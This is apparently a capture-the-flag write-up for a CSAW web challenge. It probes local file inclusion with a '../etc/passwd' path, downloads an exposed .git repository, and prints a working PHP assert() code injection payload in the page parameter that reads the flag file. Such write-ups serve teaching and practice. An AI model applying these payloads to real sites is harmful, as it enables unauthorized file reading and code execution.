Description:

Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/

 

Entering the site, the first thing that comes to mind is a LFI attack. The site is including a page which is requested in the URL.

The following table describes the possible respond pages:

URL	Result
http://web.chal.csaw.io:8000/?page=home	The “home” page is shown.
http://web.chal.csaw.io:8000/?page=about	The “about” page is shown.
http://web.chal.csaw.io:8000/?page=contact	The “contact” page is shown.
http://web.chal.csaw.io:8000/?page=Megabeets	Just a message saying: “That file doesn’t exist!”
http://web.chal.csaw.io:8000/?page=flag	An empty page is shown inside the website.
http://web.chal.csaw.io:8000/?page=../../../../etc/passwd	Just a message saying: “Detected hacking attempt!”

Looking at the source code i saw the following comment:

<!--<li ><a href="?page=flag">My secrets</a></li> -->

Ok, I need to get the “flag” page but any LFI technique I tried didn’t work. I thought about something else, In the “about” page the creator of the site mentioned that it was built using git. So let’s see if I am able to download the repository. The page http://web.chal.csaw.io:8000/.git/config exists so I downloaded the repository using DVCS-RIPPER.

You can find index.php here.

So the page is using assert() which is vulnerable to Command Injection attack. After a little trial and error I came up with the answer:

(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content

And received the flag:

string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
"
Detected hacking attempt!

If you try entering the url in a browser, look in the source of the page (CTRL+U), the flag is commented.